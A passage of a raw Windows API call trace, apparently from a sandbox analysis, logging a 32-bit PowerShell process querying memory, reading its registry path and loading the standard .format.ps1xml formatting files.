lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.067] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.067] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.073] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.080] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.080] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.081] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.081] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.082] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.083] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.083] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.083] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.086] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.086] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.086] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.087] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.087] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.089] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.092] VirtualQuery (in: lpAddress=0x2cd918, lpBuffer=0x2ce918, dwLength=0x1c | out: lpBuffer=0x2ce918*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.092] VirtualQuery (in: lpAddress=0x2cd918, lpBuffer=0x2ce918, dwLength=0x1c | out: lpBuffer=0x2ce918*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.093] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.093] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.120] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.120] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.120] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.125] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.125] GetLastError () returned 0xcb [0054.130] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.141] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.141] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.141] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.142] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.143] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.143] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.146] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.148] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.149] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cea9c | out: phkResult=0x2cea9c*=0x34c) returned 0x0 [0054.149] RegQueryValueExW (in: hKey=0x34c, lpValueName="path", lpReserved=0x0, lpType=0x2ceb04, lpData=0x0, lpcbData=0x2ceb00*=0x0 | out: lpType=0x2ceb04*=0x1, lpData=0x0, lpcbData=0x2ceb00*=0x74) returned 0x0 [0054.149] RegQueryValueExW (in: hKey=0x34c, lpValueName="path", lpReserved=0x0, lpType=0x2ceae4, lpData=0x0, lpcbData=0x2ceae0*=0x0 | out: lpType=0x2ceae4*=0x1, lpData=0x0, lpcbData=0x2ceae0*=0x74) returned 0x0 [0054.149] RegQueryValueExW (in: hKey=0x34c, lpValueName="path", lpReserved=0x0, lpType=0x2ceae4, lpData=0x3b8428, lpcbData=0x2ceae0*=0x74 | out: lpType=0x2ceae4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x2ceae0*=0x74) returned 0x0 [0054.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x2ce664, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0054.150] GetLastError () returned 0xcb [0054.150] SetErrorMode (uMode=0x1) returned 0x1 [0054.150] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x2ceae4 | out: lpFileInformation=0x2ceae4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0054.150] GetLastError () returned 0xcb [0054.150] SetErrorMode (uMode=0x1) returned 0x1 [0054.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce658, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0054.151] GetLastError () returned 0xcb [0054.151] SetErrorMode (uMode=0x1) returned 0x1 [0054.151] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2cead8 | out: lpFileInformation=0x2cead8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0054.152] GetLastError () returned 0xcb [0054.152] SetErrorMode (uMode=0x1) returned 0x1 [0054.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce658, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0054.152] GetLastError () returned 0xcb [0054.152] SetErrorMode (uMode=0x1) returned 0x1 [0054.152] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2cead8 | out: lpFileInformation=0x2cead8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0054.153] GetLastError () returned 0xcb [0054.153] SetErrorMode (uMode=0x1) returned 0x1 [0054.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce658, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0054.153] GetLastError () returned 0xcb [0054.153] SetErrorMode (uMode=0x1) returned 0x1 [0054.153] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2cead8 | out: lpFileInformation=0x2cead8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0054.154] GetLastError () returned 0xcb [0054.154] SetErrorMode (uMode=0x1) returned 0x1 [0054.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce658, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0054.154] GetLastError () returned 0xcb [0054.154] SetErrorMode (uMode=0x1) returned 0x1 [0054.154] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2cead8 | out: lpFileInformation=0x2cead8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0054.154] GetLastError () returned 0xcb [0054.154] SetErrorMode (uMode=0x1) returned 0x1 [0054.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce658, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0054.154] GetLastError () returned 0xcb [0054.154] SetErrorMode (uMode=0x1) returned 0x1 [0054.154] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2cead8 | out: lpFileInformation=0x2cead8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0054.154] GetLastError () returned 0xcb [0054.154] SetErrorMode (uMode=0x1) returned 0x1 [0054.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce658, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0054.155] GetLastError () returned 0xcb [0054.155] SetErrorMode (uMode=0x1) returned 0x1 [0054.155] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2cead8 | out: lpFileInformation=0x2cead8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0054.155] GetLastError () returned 0xcb [0054.155] SetErrorMode (uMode=0x1) returned 0x1 [0054.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce658, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0054.155] GetLastError () returned 0xcb [0054.155] SetErrorMode (uMode=0x1) returned 0x1 [0054.155] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2cead8 | out: lpFileInformation=0x2cead8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0054.155] GetLastError () returned 0xcb [0054.155] SetErrorMode (uMode=0x1) returned 0x1 [0054.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce658, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0054.155] GetLastError () returned 0xcb [0054.155] SetErrorMode (uMode=0x1) returned 0x1 [0054.155] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2cead8 | out: lpFileInformation=0x2cead8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0054.165] GetLastError () returned 0xcb [0054.165] SetErrorMode (uMode=0x1) returned 0x1 [0054.165] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce658, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0054.165] GetLastError () returned 0xcb [0054.165] SetErrorMode (uMode=0x1) returned 0x1 [0054.165] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2cead8 | out: lpFileInformation=0x2cead8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0054.165] GetLastError () returned 0xcb [0054.165] SetErrorMode (uMode=0x1) returned 0x1 [0054.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce3ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0054.170] GetLastError () returned 0xcb [0054.170] SetErrorMode (uMode=0x1) returned 0x1 [0054.170] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c [0054.171] GetLastError () returned 0x0 [0054.171] GetFileType (hFile=0x31c) returned 0x1 [0054.171] SetErrorMode (uMode=0x1) returned 0x1 [0054.171] GetFileType (hFile=0x31c) returned 0x1 [0054.171] ReadFile (in: hFile=0x31c, lpBuffer=0x2dae608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2dae608*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.172] GetLastError () returned 0x0 [0054.174] ReadFile (in: hFile=0x31c, lpBuffer=0x2dae608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2dae608*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.174] GetLastError () returned 0x0 [0054.174] ReadFile (in: hFile=0x31c, lpBuffer=0x2dae608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2dae608*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.174] GetLastError () returned 0x0 [0054.175] ReadFile (in: hFile=0x31c, lpBuffer=0x2dae608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2dae608*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.175] GetLastError () returned 0x0 [0054.175] ReadFile (in: hFile=0x31c, lpBuffer=0x2dae608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2dae608*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.175] GetLastError () returned 0x0 [0054.175] ReadFile (in: hFile=0x31c, lpBuffer=0x2dae608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2dae608*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.175] GetLastError () returned 0x0 [0054.175] ReadFile (in: hFile=0x31c, lpBuffer=0x2dae608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2dae608*, lpNumberOfBytesRead=0x2ce954*=0x9e2, lpOverlapped=0x0) returned 1 [0054.175] GetLastError () returned 0x0 [0054.175] ReadFile (in: hFile=0x31c, lpBuffer=0x2dadb8a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2dadb8a*, lpNumberOfBytesRead=0x2ce954*=0x0, lpOverlapped=0x0) returned 1 [0054.175] GetLastError () returned 0x0 [0054.175] ReadFile (in: hFile=0x31c, lpBuffer=0x2dae608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2dae608*, lpNumberOfBytesRead=0x2ce954*=0x0, lpOverlapped=0x0) returned 1 [0054.175] GetLastError () returned 0x0 [0054.176] CloseHandle (hObject=0x31c) returned 1 [0054.176] GetLastError () returned 0x0 [0054.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce4b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0054.176] GetLastError () returned 0x0 [0054.176] SetErrorMode (uMode=0x1) returned 0x1 [0054.176] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2dbf6c4 | out: lpFileInformation=0x2dbf6c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, 